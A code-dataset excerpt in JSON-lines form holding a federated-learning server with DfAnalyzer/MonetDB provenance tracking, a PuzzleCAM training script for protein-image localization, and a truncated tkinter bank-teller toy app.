(self.get_attribute(\"fl_round\") - 1),\n dataflow_tag,\n \"clientevaluation\",\n ),\n )\n\n starting_time = time.ctime()\n t12.begin()\n\n total_num_clients = len(testing_metrics)\n # Get the Testing Metrics Names.\n metrics_names_list = list(testing_metrics[0][1].keys())\n # Multiply Each Testing Metrics Value of Each Participating Client\n # By His Number of Testing Examples (Client's Contribution).\n metrics_products_list = []\n for metric_name in metrics_names_list:\n metric_product = [\n num_examples * metric[metric_name]\n for num_examples, metric in testing_metrics\n ]\n metrics_products_list.append(metric_product)\n # Get the Total Number of Testing Examples (of All Participating Clients).\n total_num_examples = sum([num_examples for num_examples, _ in testing_metrics])\n # Aggregate the Testing Metrics (Weighted Average).\n aggregated_metrics = {}\n for metric_index in range(0, len(metrics_names_list)):\n metric_name = metrics_names_list[metric_index]\n weighted_average_metric = (\n sum(metrics_products_list[metric_index]) / total_num_examples\n )\n aggregated_metrics[metric_name] = weighted_average_metric\n\n # Log the Aggregated Testing Metrics (If Logger is Enabled for \"INFO\" Level).\n message = \"[Server {0} | FL Round {1} | {2}] Aggregated Testing Metrics (Weighted Average): {3}\".format(\n self.get_attribute(\"server_id\"),\n self.get_attribute(\"fl_round\"),\n \"\".join(\n [\n str(total_num_clients),\n \" Clients\" if total_num_clients > 1 else \" Client\",\n ]\n ),\n aggregated_metrics,\n )\n self.log_message(message, \"INFO\")\n\n to_dfanalyzer = [\n self.get_attribute(\"fl_round\"),\n total_num_clients,\n total_num_examples,\n aggregated_metrics[\"sparse_categorical_accuracy\"],\n aggregated_metrics[\"loss\"],\n aggregated_metrics[\"evaluate_time\"],\n starting_time,\n time.ctime(),\n ]\n\n t12_output = DataSet(\"oServerEvaluationAggregation\", [Element(to_dfanalyzer)])\n t12.add_dataset(t12_output)\n t12.end()\n # Return the Aggregated Testing Metrics.\n return aggregated_metrics\n\n def instantiate_server_aggregation_strategy(self) -> Strategy:\n # Get Server Config File.\n server_config_file = self.get_attribute(\"server_config_file\")\n # Init ConfigParser Object.\n cp = ConfigParser()\n cp.optionxform = str\n cp.read(filenames=server_config_file, encoding=\"utf-8\")\n fl_settings = self.get_attribute(\"fl_settings\")\n server_aggregation_strategy = None\n t2 = Task(2, dataflow_tag, \"Strategy\")\n\n t2.begin()\n if fl_settings[\"server_aggregation_strategy\"] == \"FedAvg\":\n # FedAvg - Federated Averaging Aggregation Strategy.\n server_aggregation_strategy = FedAvg(\n fraction_fit=fl_settings[\"fraction_fit\"],\n fraction_evaluate=fl_settings[\"fraction_evaluate\"],\n min_fit_clients=fl_settings[\"min_fit_clients\"],\n min_evaluate_clients=fl_settings[\"min_evaluate_clients\"],\n min_available_clients=fl_settings[\"min_available_clients\"],\n evaluate_fn=self.evaluate_fn,\n on_fit_config_fn=self.on_fit_config_fn,\n on_evaluate_config_fn=self.on_evaluate_config_fn,\n accept_failures=fl_settings[\"accept_rounds_containing_failures\"],\n initial_parameters=self.get_attribute(\n \"initial_global_model_parameters\"\n ),\n fit_metrics_aggregation_fn=self.fit_metrics_aggregation_fn,\n evaluate_metrics_aggregation_fn=self.evaluate_metrics_aggregation_fn,\n )\n t2_input = DataSet(\"iStrategy\", [Element([0, 0])])\n t2.add_dataset(t2_input)\n\n elif fl_settings[\"server_aggregation_strategy\"] == \"FedAvgM\":\n # Parse 'FedAvgM Settings'.\n fed_avg_m_settings = self.parse_config_section(cp, \"FedAvgM Settings\")\n # FedAvgM - Federated Averaging with Server Momentum Aggregation Strategy.\n server_aggregation_strategy = FedAvgM(\n fraction_fit=fl_settings[\"fraction_fit\"],\n fraction_evaluate=fl_settings[\"fraction_evaluate\"],\n min_fit_clients=fl_settings[\"min_fit_clients\"],\n min_evaluate_clients=fl_settings[\"min_evaluate_clients\"],\n min_available_clients=fl_settings[\"min_available_clients\"],\n evaluate_fn=self.evaluate_fn,\n on_fit_config_fn=self.on_fit_config_fn,\n on_evaluate_config_fn=self.on_evaluate_config_fn,\n accept_failures=fl_settings[\"accept_rounds_containing_failures\"],\n initial_parameters=self.get_attribute(\n \"initial_global_model_parameters\"\n ),\n fit_metrics_aggregation_fn=self.fit_metrics_aggregation_fn,\n evaluate_metrics_aggregation_fn=self.evaluate_metrics_aggregation_fn,\n server_learning_rate=fed_avg_m_settings[\"server_learning_rate\"],\n server_momentum=fed_avg_m_settings[\"server_momentum\"],\n )\n\n attributes = [\"server_learning_rate\", \"server_momentum\"]\n to_dfanalyzer = [fed_avg_m_settings.get(attr, None) for attr in attributes]\n t2_input = DataSet(\"iStrategy\", [Element(to_dfanalyzer)])\n t2.add_dataset(t2_input)\n t2_output = DataSet(\"oStrategy\", [Element([])])\n t2.add_dataset(t2_output)\n t2.end()\n # Unbind ConfigParser Object (Garbage Collector).\n del cp\n return server_aggregation_strategy\n\n def instantiate_flower_server(self) -> Server:\n # Instantiate Simple Client Manager.\n simple_client_manager = self.instantiate_simple_client_manager()\n # Instantiate Server's Aggregation Strategy.\n server_aggregation_strategy = self.instantiate_server_aggregation_strategy()\n # Instantiate Flower Server.\n flower_server = Server(\n client_manager=simple_client_manager, strategy=server_aggregation_strategy\n )\n return flower_server\n\n def instantiate_flower_server_config(self) -> ServerConfig:\n fl_settings = self.get_attribute(\"fl_settings\")\n # Instantiate Flower Server's Config.\n flower_server_config = ServerConfig(\n num_rounds=fl_settings[\"num_rounds\"],\n round_timeout=fl_settings[\"round_timeout_in_seconds\"],\n )\n return flower_server_config\n\n def get_ssl_certificates(self) -> Optional[Tuple[bytes]]:\n fl_settings = self.get_attribute(\"fl_settings\")\n ssl_certificates = None\n if fl_settings[\"enable_ssl\"]:\n ssl_settings = self.get_attribute(\"ssl_settings\")\n prefix_path = Path(\"./FlowerServer_\" + str(self.get_attribute(\"server_id\")))\n ca_certificate_bytes = prefix_path.joinpath(\n ssl_settings[\"ca_certificate_file\"]\n ).read_bytes()\n server_certificate_bytes = prefix_path.joinpath(\n ssl_settings[\"server_certificate_file\"]\n ).read_bytes()\n server_rsa_private_key_bytes = prefix_path.joinpath(\n ssl_settings[\"server_rsa_private_key_file\"]\n ).read_bytes()\n ssl_certificates = (\n ca_certificate_bytes,\n server_certificate_bytes,\n server_rsa_private_key_bytes,\n )\n return ssl_certificates\n\n def start_flower_server(self) -> None:\n # Get gRPC Server's Listen IP Address and Port.\n grpc_listen_ip_address_and_port = self.get_grpc_listen_ip_address_and_port()\n # Get Flower Server.\n flower_server = self.get_attribute(\"flower_server\")\n # Get Flower Server's Config.\n flower_server_config = self.get_attribute(\"flower_server_config\")\n # Get gRPC Max Message Length (in Bytes).\n grpc_max_message_length_in_bytes = self.get_grpc_max_message_length_in_bytes()\n # Get Secure Socket Layer (SSL) Certificates (SSL-Enabled Secure Connection).\n ssl_certificates = self.get_ssl_certificates()\n # Start Flower Server.\n start_server(\n server_address=grpc_listen_ip_address_and_port,\n server=flower_server,\n config=flower_server_config,\n grpc_max_message_length=grpc_max_message_length_in_bytes,\n certificates=ssl_certificates,\n )\n\n\ndef main() -> None:\n # Begin.\n\n ##########\n # DfAnalyzer Instrumentation\n df = Dataflow(dataflow_tag)\n\n tf1 = Transformation(\"ServerConfig\")\n tf1_input = Set(\n \"iServerConfig\",\n SetType.INPUT,\n [\n Attribute(\"server_id\", AttributeType.NUMERIC),\n Attribute(\"address\", AttributeType.TEXT),\n Attribute(\"max_message_length_in_bytes\", AttributeType.TEXT),\n Attribute(\"num_rounds\", AttributeType.NUMERIC),\n Attribute(\"round_timeout_in_seconds\", AttributeType.NUMERIC),\n Attribute(\"accept_rounds_with_failures\", AttributeType.TEXT),\n Attribute(\"enable_ssl\", AttributeType.TEXT),\n Attribute(\"enable_dynamic_adjustment\", AttributeType.TEXT),\n Attribute(\"server_aggregation_strategy\", AttributeType.TEXT),\n Attribute(\"fraction_fit\", AttributeType.NUMERIC),\n Attribute(\"fraction_evaluate\", AttributeType.NUMERIC),\n Attribute(\"min_fit_clients\", AttributeType.NUMERIC),\n Attribute(\"min_evaluate_clients\", AttributeType.NUMERIC),\n Attribute(\"min_available_clients\", AttributeType.NUMERIC),\n ],\n )\n tf1_output = Set(\"oServerConfig\", SetType.OUTPUT, [])\n tf1.set_sets([tf1_input, tf1_output])\n df.add_transformation(tf1)\n\n tf2 = Transformation(\"Strategy\")\n\n tf2_input = Set(\n \"iStrategy\",\n SetType.INPUT,\n [\n Attribute(\"server_learning_rate\", AttributeType.NUMERIC),\n Attribute(\"server_momentum\", AttributeType.NUMERIC),\n ],\n )\n tf2_output = Set(\"oStrategy\", SetType.OUTPUT, [])\n tf2.set_sets([tf2_input, tf2_output])\n df.add_transformation(tf2)\n\n tf3 = Transformation(\"DatasetLoad\")\n tf3_input = Set(\n \"iDatasetLoad\",\n SetType.INPUT,\n [\n Attribute(\"client_id\", AttributeType.NUMERIC),\n Attribute(\"loading_time\", AttributeType.TEXT),\n ],\n )\n tf3_output = Set(\"oDatasetLoad\", SetType.OUTPUT, [])\n tf3.set_sets([tf3_input, tf3_output])\n df.add_transformation(tf3)\n\n tf4 = Transformation(\"ModelConfig\")\n tf4_input = Set(\n \"iModelConfig\",\n SetType.INPUT,\n [\n Attribute(\"model\", AttributeType.TEXT),\n Attribute(\"optimizer\", AttributeType.TEXT),\n Attribute(\"loss_function\", AttributeType.TEXT),\n Attribute(\"loss_weights\", AttributeType.TEXT),\n Attribute(\"weighted_metrics\", AttributeType.TEXT),\n Attribute(\"run_eagerly\", AttributeType.TEXT),\n Attribute(\"steps_per_execution\", AttributeType.NUMERIC),\n Attribute(\"jit_compile\", AttributeType.TEXT),\n Attribute(\"input_shape\", AttributeType.TEXT),\n Attribute(\"alpha\", AttributeType.NUMERIC),\n Attribute(\"include_top\", AttributeType.TEXT),\n Attribute(\"weights\", AttributeType.TEXT),\n Attribute(\"input_tensor\", AttributeType.TEXT),\n Attribute(\"pooling\", AttributeType.TEXT),\n Attribute(\"classes\", AttributeType.NUMERIC),\n Attribute(\"classifier_activation\", AttributeType.TEXT),\n ],\n )\n\n tf4_output = Set(\n \"oModelConfig\",\n SetType.OUTPUT,\n [],\n )\n\n tf4.set_sets([tf4_input, tf4_output])\n df.add_transformation(tf4)\n\n tf5 = Transformation(\"OptimizerConfig\")\n tf5_input = Set(\n \"iOptimizerConfig\",\n SetType.INPUT,\n [\n Attribute(\"learning_rate\", AttributeType.NUMERIC),\n Attribute(\"momentum\", AttributeType.NUMERIC),\n Attribute(\"nesterov\", AttributeType.TEXT),\n Attribute(\"name\", AttributeType.TEXT),\n ],\n )\n\n tf5_output = Set(\n \"oOptimizerConfig\",\n SetType.OUTPUT,\n [],\n )\n\n tf5.set_sets([tf5_input, tf5_output])\n df.add_transformation(tf5)\n\n tf6 = Transformation(\"LossConfig\")\n tf6_input = Set(\n \"iLossConfig\",\n SetType.INPUT,\n [\n Attribute(\"from_logits\", AttributeType.TEXT),\n Attribute(\"ignore_class\", AttributeType.TEXT),\n Attribute(\"reduction\", AttributeType.TEXT),\n Attribute(\"name\", AttributeType.TEXT),\n ],\n )\n tf6_output = Set(\n \"oLossConfig\",\n SetType.OUTPUT,\n [],\n )\n\n tf6.set_sets([tf6_input, tf6_output])\n df.add_transformation(tf6)\n\n tf7 = Transformation(\"TrainingConfig\")\n tf7_input = Set(\n \"iTrainingConfig\",\n SetType.INPUT,\n [\n Attribute(\"server_round\", AttributeType.NUMERIC),\n Attribute(\"starting_time\", AttributeType.TEXT),\n Attribute(\"ending_time\", AttributeType.TEXT),\n Attribute(\"shuffle\", AttributeType.TEXT),\n Attribute(\"batch_size\", AttributeType.NUMERIC),\n Attribute(\"initial_epoch\", AttributeType.NUMERIC),\n Attribute(\"epochs\", AttributeType.NUMERIC),\n Attribute(\"steps_per_epoch\", AttributeType.TEXT),\n Attribute(\"validation_split\", AttributeType.NUMERIC),\n Attribute(\"validation_batch_size\", AttributeType.TEXT),\n ],\n )\n\n tf7_output = Set(\n \"oTrainingConfig\",\n SetType.OUTPUT,\n [\n Attribute(\"server_round\", AttributeType.NUMERIC),\n Attribute(\"dynamically_adjusted\", AttributeType.TEXT),\n ],\n )\n\n tf1_output.set_type(SetType.INPUT)\n tf1_output.dependency = tf1._tag\n\n tf2_output.set_type(SetType.INPUT)\n tf2_output.dependency = tf2._tag\n\n tf7.set_sets([tf1_output, tf2_output, tf7_input, tf7_output])\n\n df.add_transformation(tf7)\n\n tf8 = Transformation(\"ClientTraining\")\n\n tf8_output = Set(\n \"oClientTraining\",\n SetType.OUTPUT,\n [\n Attribute(\"client_id\", AttributeType.NUMERIC),\n Attribute(\"server_round\", AttributeType.NUMERIC),\n Attribute(\"training_time\", AttributeType.NUMERIC),\n Attribute(\"size_x_train\", AttributeType.NUMERIC),\n Attribute(\"global_current_parameters\", AttributeType.TEXT),\n Attribute(\"accuracy\", AttributeType.NUMERIC),\n Attribute(\"loss\", AttributeType.NUMERIC),\n Attribute(\"val_loss\", AttributeType.NUMERIC),\n Attribute(\"val_accuracy\", AttributeType.TEXT),\n Attribute(\"local_weights\", AttributeType.TEXT),\n Attribute(\"starting_time\", AttributeType.TEXT),\n Attribute(\"ending_time\", AttributeType.TEXT),\n ],\n )\n\n tf3_output.set_type(SetType.INPUT)\n tf3_output.dependency = tf3._tag\n\n tf4_output.set_type(SetType.INPUT)\n tf4_output.dependency = tf4._tag\n\n tf5_output.set_type(SetType.INPUT)\n tf5_output.dependency = tf5._tag\n\n tf6_output.set_type(SetType.INPUT)\n tf6_output.dependency = tf6._tag\n\n tf7_output.set_type(SetType.INPUT)\n tf7_output.dependency = tf7._tag\n\n tf8.set_sets(\n [\n tf3_output,\n tf4_output,\n tf5_output,\n tf6_output,\n tf7_output,\n tf8_output,\n ]\n )\n df.add_transformation(tf8)\n\n tf9 = Transformation(\"ServerTrainingAggregation\")\n tf9_output = Set(\n \"oServerTrainingAggregation\",\n SetType.OUTPUT,\n [\n Attribute(\"server_round\", AttributeType.NUMERIC),\n Attribute(\"total_num_clients\", AttributeType.NUMERIC),\n Attribute(\"total_num_examples\", AttributeType.NUMERIC),\n Attribute(\"accuracy\", AttributeType.NUMERIC),\n Attribute(\"loss\", AttributeType.NUMERIC),\n Attribute(\"val_accuracy\", AttributeType.NUMERIC),\n Attribute(\"val_loss\", AttributeType.NUMERIC),\n Attribute(\"training_time\", AttributeType.NUMERIC),\n Attribute(\"starting_time\", AttributeType.TEXT),\n Attribute(\"ending_time\", AttributeType.TEXT),\n ],\n )\n\n tf8_output.set_type(SetType.INPUT)\n tf8_output.dependency = tf8._tag\n\n tf9.set_sets([tf8_output, tf9_output])\n df.add_transformation(tf9)\n\n tf10 = Transformation(\"EvaluationConfig\")\n tf10_input = Set(\n \"iEvaluationConfig\",\n SetType.INPUT,\n [\n Attribute(\"batch_size\", AttributeType.NUMERIC),\n Attribute(\"steps\", AttributeType.TEXT),\n ],\n )\n\n tf10_output = Set(\n \"oEvaluationConfig\",\n SetType.OUTPUT,\n [],\n )\n\n tf9_output.set_type(SetType.INPUT)\n tf9_output.dependency = tf9._tag\n\n tf10.set_sets([tf9_output, tf10_input, tf10_output])\n df.add_transformation(tf10)\n\n tf11 = Transformation(\"ClientEvaluation\")\n\n tf11_output = Set(\n \"oClientEvaluation\",\n SetType.OUTPUT,\n [\n Attribute(\"client_id\", AttributeType.NUMERIC),\n Attribute(\"server_round\", AttributeType.NUMERIC),\n Attribute(\"loss\", AttributeType.NUMERIC),\n Attribute(\"evaluation_time\", AttributeType.NUMERIC),\n Attribute(\"accuracy\", AttributeType.NUMERIC),\n Attribute(\"num_testing_examples\", AttributeType.NUMERIC),\n Attribute(\"starting_time\", AttributeType.TEXT),\n Attribute(\"ending_time\", AttributeType.TEXT),\n ],\n )\n\n tf10_output.set_type(SetType.INPUT)\n tf10_output.dependency = tf10._tag\n\n tf11.set_sets([tf10_output, tf11_output])\n df.add_transformation(tf11)\n\n tf12 = Transformation(\"ServerEvaluationAggregation\")\n\n tf12_output = Set(\n \"oServerEvaluationAggregation\",\n SetType.OUTPUT,\n [\n Attribute(\"server_round\", AttributeType.NUMERIC),\n Attribute(\"total_num_clients\", AttributeType.NUMERIC),\n Attribute(\"total_num_examples\", AttributeType.NUMERIC),\n Attribute(\"accuracy\", AttributeType.NUMERIC),\n Attribute(\"loss\", AttributeType.NUMERIC),\n Attribute(\"evaluation_time\", AttributeType.NUMERIC),\n Attribute(\"starting_time\", AttributeType.TEXT),\n Attribute(\"ending_time\", AttributeType.TEXT),\n ],\n )\n\n tf11_output.set_type(SetType.INPUT)\n tf11_output.dependency = tf11._tag\n\n tf12.set_sets([tf11_output, tf12_output])\n df.add_transformation(tf12)\n\n tf12_output.set_type(SetType.INPUT)\n tf12_output.dependency = tf12._tag\n\n tf7 = Transformation(\"TrainingConfig\")\n\n tf7.set_sets([tf12_output])\n df.add_transformation(tf7)\n\n df.save()\n tries = 0\n while tries < 100:\n try:\n conn = pymonetdb.connect(\n username=\"monetdb\",\n password=\"monetdb\",\n hostname=\"localhost\",\n port=\"50000\",\n database=\"dataflow_analyzer\",\n )\n cursor = conn.cursor()\n cursor.execute(\n \"\"\"\n CREATE OR REPLACE FUNCTION check_metrics (fl_round int)\n RETURNS table (training_time double, accuracy_training double, loss_training double, \n val_accuracy double, val_loss double, accuracy_evaluation double, loss_evaluation double)\n BEGIN\n RETURN\n SELECT\n st.training_time,\n st.accuracy,\n st.loss,\n st.val_accuracy,\n st.val_loss,\n se.accuracy,\n se.loss\n FROM\n oservertrainingaggregation as st\n JOIN \n oserverevaluationaggregation as se\n ON\n st.server_round = se.server_round\n WHERE\n st.server_round = fl_round;\n END;\"\"\"\n )\n\n cursor.execute(\n \"\"\"CREATE FUNCTION update_hyperparameters (accuracy_goal double,\n limit_training_time double,\n limit_accuracy_change double,\n fl_round int)\n RETURNS boolean\n BEGIN\n RETURN\n SELECT \n CASE WHEN (SELECT DISTINCT dynamically_adjusted FROM otrainingconfig\n WHERE server_round BETWEEN fl_round - 2 AND fl_round - 1 AND dynamically_adjusted = 'True') IS NOT NULL THEN 0\n WHEN (SELECT DISTINCT\n CASE\n WHEN (last_value(accuracy_training) OVER () < accuracy_goal\n AND last_value(training_time) OVER () < limit_training_time*60 \n AND (last_value(accuracy_training) OVER () > first_value(accuracy_training) OVER ()\n AND last_value(val_accuracy) OVER () > first_value(val_accuracy) OVER ())\n AND last_value(accuracy_training) OVER () - first_value(accuracy_training) OVER () < limit_accuracy_change)\n THEN 1\n ELSE 0\n END\n FROM\n (\n SELECT * FROM check_metrics(fl_round - 2)\n UNION \n SELECT * FROM check_metrics(fl_round - 1)) AS t1) THEN 1\n ELSE 0\n END;\n END;\"\"\"\n )\n\n conn.commit()\n cursor.close()\n conn.close()\n break\n except Exception as e:\n time.sleep(1)\n tries += 1\n\n ##########\n # Parse Flower Server Arguments.\n ag = ArgumentParser(description=\"Flower Server Arguments\")\n ag.add_argument(\n \"--server_id\", type=int, required=True, help=\"Server ID (no default)\"\n )\n ag.add_argument(\n \"--server_config_file\",\n type=Path,\n required=True,\n help=\"Server Config File (no default)\",\n )\n parsed_args = ag.parse_args()\n # Get Flower Server Arguments.\n server_id = int(parsed_args.server_id)\n server_config_file = Path(parsed_args.server_config_file)\n # Init FlowerServer Object.\n fs = FlowerServer(server_id, server_config_file)\n # Parse Flower Server Config File.\n fs.parse_flower_server_config_file()\n # Instantiate and Set Logger.\n logger = fs.load_logger()\n fs.set_attribute(\"logger\", logger)\n # Load and Set Initial Global Model Parameters.\n initial_global_model_parameters = fs.load_initial_global_model_parameters()\n fs.set_attribute(\"initial_global_model_parameters\", initial_global_model_parameters)\n # Load and Set Initial Fit Config.\n fit_config = fs.load_initial_fit_config()\n fs.set_attribute(\"fit_config\", fit_config)\n # Load and Set Initial Evaluate Config.\n evaluate_config = fs.load_initial_evaluate_config()\n fs.set_attribute(\"evaluate_config\", evaluate_config)\n # Instantiate and Set Flower Server.\n flower_server = fs.instantiate_flower_server()\n fs.set_attribute(\"flower_server\", flower_server)\n # Instantiate and Set Flower Server's Config.\n flower_server_config = fs.instantiate_flower_server_config()\n fs.set_attribute(\"flower_server_config\", flower_server_config)\n # Start Flower Server.\n fs.start_flower_server()\n # Unbind Objects (Garbage Collector).\n del ag\n del fs\n # End.\n exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nymeria-42/dfanalyzer-with-flower","sub_path":"flowering/dfanalyzer-code/flower_server.py","file_name":"flower_server.py","file_ext":"py","file_size_in_byte":58037,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"40945507580","text":"import os\nfrom yaml import safe_load\n\nimport albumentations as A\nfrom albumentations.pytorch import ToTensorV2\nimport pandas as pd\nimport torch\nfrom torch.nn import MSELoss, ReLU, Sequential\nfrom torch.optim import AdamW\nfrom torch.utils.data import DataLoader\n\nfrom hpa.data import RGBYDataset, N_CHANNELS, N_CLASSES\nfrom hpa.data.transforms import HPACompose\nfrom hpa.model.bestfitting.densenet import DensenetClass\nfrom hpa.model.localizers import PuzzleCAM\nfrom hpa.model.loss import FocalSymmetricLovaszHardLogLoss\nfrom hpa.utils import create_folder\nfrom hpa.utils.train import checkpoint, Logger, train_puzzlecam_epoch, test_epoch\n\n# TODO: try adding an declining scheduler for the regularization alpha hyperparameter\nif __name__ == '__main__':\n print('Training a weakly-supervised max-pooled localizer with pretrained encoder')\n\n # -------------------------------------------------------------------------------------------\n # Read in the config\n # -------------------------------------------------------------------------------------------\n CONFIG_PATH = '/home/mchobanyan/data/kaggle/hpa-single-cell/configs/puzzlecam/puzzlecam-3.yaml'\n with open(CONFIG_PATH, 'r') as file:\n config = safe_load(file)\n\n # -------------------------------------------------------------------------------------------\n # Prepare the augmentations\n # -------------------------------------------------------------------------------------------\n img_dim = config['data']['image_size']\n transform_fn = HPACompose([\n A.Resize(img_dim, img_dim),\n A.Flip(p=0.5),\n A.ShiftScaleRotate(p=0.5),\n A.Normalize(\n mean=[0.074598, 0.050630, 0.050891, 0.076287],\n std=[0.122813, 0.085745, 0.129882, 0.119411],\n max_pixel_value=255\n ),\n ToTensorV2()\n ])\n\n val_transform_fn = HPACompose([\n A.Resize(img_dim, img_dim, p=1.0),\n A.Normalize(\n mean=[0.074598, 0.050630, 0.050891, 0.076287],\n std=[0.122813, 0.085745, 0.129882, 0.119411],\n max_pixel_value=255\n ),\n ToTensorV2()\n ])\n\n # -------------------------------------------------------------------------------------------\n # Prepare the data\n # -------------------------------------------------------------------------------------------\n ROOT_DIR = config['data']['root_dir']\n DATA_DIR = os.path.join(ROOT_DIR, 'train')\n EXTERNAL_DATA_DIR = os.path.join(ROOT_DIR, 'misc', 'public-hpa', 'data2')\n NUM_WORKERS = 4\n\n train_idx = pd.read_csv(os.path.join(ROOT_DIR, 'full-train-index.csv'))\n # train_idx = pd.read_csv(os.path.join(ROOT_DIR, 'train-index.csv'))\n val_idx = pd.read_csv(os.path.join(ROOT_DIR, 'val-index.csv'))\n\n # train_idx = train_idx.head(32)\n # val_idx = val_idx.head(32)\n\n train_data = RGBYDataset(train_idx, DATA_DIR, external_data_dir=EXTERNAL_DATA_DIR, transforms=transform_fn)\n # train_data = RGBYDataset(train_idx, DATA_DIR, transforms=transform_fn)\n val_data = RGBYDataset(val_idx, DATA_DIR, transforms=val_transform_fn)\n\n BATCH_SIZE = config['data']['batch_size']\n train_loader = DataLoader(train_data, batch_size=BATCH_SIZE, shuffle=True, num_workers=NUM_WORKERS)\n val_loader = DataLoader(val_data, batch_size=BATCH_SIZE, num_workers=NUM_WORKERS)\n\n # -------------------------------------------------------------------------------------------\n # Prepare the model\n # -------------------------------------------------------------------------------------------\n DEVICE = 'cuda'\n LR = config['model']['lr']\n TILES_PER_DIM = config['model']['tiles_per_dim']\n ALPHA = config['model']['alpha']\n N_EPOCHS = config['model']['epochs']\n PRETRAINED_PATH = config['pretrained_path']\n\n densenet_model = DensenetClass(in_channels=N_CHANNELS, dropout=True)\n\n # load the pretrained DenseNet model\n if PRETRAINED_PATH != '':\n print('Loading pre-trained model')\n pretrained_state_dict = torch.load(PRETRAINED_PATH)['state_dict']\n densenet_model.load_state_dict(pretrained_state_dict)\n\n # isolate the CNN encoder\n densenet_encoder = Sequential(densenet_model.conv1,\n densenet_model.encoder2,\n densenet_model.encoder3,\n densenet_model.encoder4,\n densenet_model.encoder5,\n ReLU())\n\n # define the localizer model\n model = PuzzleCAM(densenet_encoder,\n n_classes=N_CLASSES - 1,\n tile_size=(TILES_PER_DIM, TILES_PER_DIM),\n n_hidden_filters=1024)\n\n model = model.to(DEVICE)\n\n criterion = FocalSymmetricLovaszHardLogLoss()\n reg_criterion = MSELoss()\n optimizer = AdamW(model.parameters(), lr=LR)\n\n # -------------------------------------------------------------------------------------------\n # Train the model\n # -------------------------------------------------------------------------------------------\n LOGGER_PATH = config['logger_path']\n CHECKPOINT_DIR = config['checkpoint_dir']\n create_folder(os.path.dirname(LOGGER_PATH))\n create_folder(os.path.dirname(CHECKPOINT_DIR))\n\n N_TRAIN_BATCHES = int(len(train_data) / BATCH_SIZE)\n N_VAL_BATCHES = int(len(val_data) / BATCH_SIZE)\n\n header = [\n 'epoch', 'train_loss', 'train_full_loss', 'train_tile_loss', 'train_reg_loss',\n 'val_loss', 'val_bce_loss', 'val_focal_loss'\n ]\n logger = Logger(LOGGER_PATH, header=header)\n\n best_loss = float('inf')\n for epoch in range(N_EPOCHS):\n\n model.use_tiles = True\n train_loss, train_full_loss, train_tile_loss, train_reg_loss = train_puzzlecam_epoch(model=model,\n dataloader=train_loader,\n criterion=criterion,\n reg_criterion=reg_criterion,\n optimizer=optimizer,\n device=DEVICE,\n reg_alpha=ALPHA,\n clip_grad_value=1,\n progress=True,\n epoch=epoch,\n n_batches=N_TRAIN_BATCHES)\n\n model.use_tiles = False\n val_loss, val_bce_loss, val_focal_loss = test_epoch(model,\n val_loader,\n criterion,\n DEVICE,\n calc_bce=True,\n calc_focal=True,\n progress=True,\n epoch=epoch,\n n_batches=N_VAL_BATCHES)\n\n logger.add_entry(epoch, train_loss, train_full_loss, train_tile_loss, train_reg_loss,\n val_loss, val_bce_loss, val_focal_loss)\n\n # checkpoint all epochs for now\n checkpoint(model, os.path.join(CHECKPOINT_DIR, f'model{epoch}.pth'))\n","repo_name":"martin-chobanyan/hpa-single-cell","sub_path":"scripts/train/puzzle/puzzlecam_finetuned.py","file_name":"puzzlecam_finetuned.py","file_ext":"py","file_size_in_byte":7890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14432466601","text":"\"\"\"\nThis program simulate a Bank Teller.\n\"\"\"\n\n# Libraries\nimport tkinter as tk\nfrom tkinter import messagebox\n\n# Program\nclass BankTeller:\n def __init__(self):\n self.window = tk.Tk()\n self.window.title(\"Bank Teller\")\n self.secret_code = tk.StringVar()\n self.cash = 1000\n self.create_widgets()\n\n def create_widgets(self):\n secret_code_label = tk.Label(self.window, text=\"Enter your secret code: (0000)\")\n secret_code_label.pack()\n\n secret_code_entry = tk.Entry(self.window, textvariable=self.secret_code, show=\"*\")\n secret_code_entry.pack()\n\n identification_button = tk.Button(self.window, text=\"Enter\", command=self.identification)\n identification_button.pack()\n\n # Center the window\n window_width = 400\n window_height = 300\n screen_width = self.window.winfo_screenwidth()\n screen_height = self.window.winfo_screenheight()\n x_coordinate = int((screen_width - window_width) / 2)\n y_coordinate = int((screen_height - window_height) / 2)\n self.window.geometry(f\"{window_width}x{window_height}+{x_coordinate}+{y_coordinate}\")\n\n self.window.mainloop()\n\n def identification(self):\n code = self.secret_code.get()\n if code == \"0000\":\n self.show_menu()\n else:\n messagebox.showerror(\"Identification\", \"Wrong code. Please try again.\")\n\n def show_menu(self):\n menu_window = tk.Toplevel(self.window)\n menu_window.title(\"Bank Teller Panel\")\n\n show_cash_button = tk.Button(menu_window, text=\"Show my cash\", command=self.show_cash)\n show_cash_button.pack()\n\n withdraw_button = tk.Button(menu_window, text=\"Withdraw money\", command=self.withdraw_gui)\n withdraw_button.pack()\n\n deposit_button = tk.Button(menu_window, text=\"Deposit money\", command=self.deposit_gui)\n deposit_button.pack()\n\n send_money_button = tk.Button(menu_window, text=\"Send money\", command=self.send_gui)\n send_money_button.pack()\n\n exit_button = tk.Button(menu_window, text=\"Exit\", command=self.window.destroy)\n exit_button.pack()\n\n # Center the window\n window_width = 300\n window_height = 200\n screen_width = self.window.winfo_screenwidth()\n screen_height = self.window.winfo_screenheight()\n x_coordinate = int((screen_width - window_width) / 2)\n y_coordinate = int((screen_height - window_height) / 2)\n menu_window.geometry(f\"{window_width}x{window_height}+{x_coordinate}+{y_coordinate}\")\n\n def show_cash(self):\n messagebox.showinfo(\"Balance\", f\"Your current balance is: {self.cash} $\")\n\n def withdraw(self, amount, window):\n try:\n amount = float(amount)\n if amount <= self.cash:\n self.cash -= amount\n messagebox.showinfo(\"Withdraw\", f\"Withdrew {amount} $. Remaining balance: {self.cash} $\")\n else:\n messagebox.showerror(\"Error\", \"Insufficient funds!\")\n except ValueError:\n messagebox.showerror(\"Error\", \"Invalid amount.\")\n\n window.destroy()\n\n def deposit(self, amount, window):\n try:\n amount = float(amount)\n self.cash += amount\n messagebox.showinfo(\"Deposit\", f\"Deposited {amount} $. New balance: {self.cash} $\")\n except ValueError:\n messagebox.showerror(\"Error\", \"Invalid amount.\")\n\n window.destroy()\n\n def send(self, receiver, amount, window):\n try:\n receiver = int(receiver)\n amount = float(amount)\n if amount <= self.cash:\n self.cash -= amount\n messagebox.showinfo(\"Send Money\", f\"Money sent successfully. New balance: {self.cash} $\")\n else:\n messagebox.showerror(\"Error\", \"Insufficient funds.\")\n except ValueError:\n messagebox.showerror(\"Error\", \"Invalid input.\")\n\n 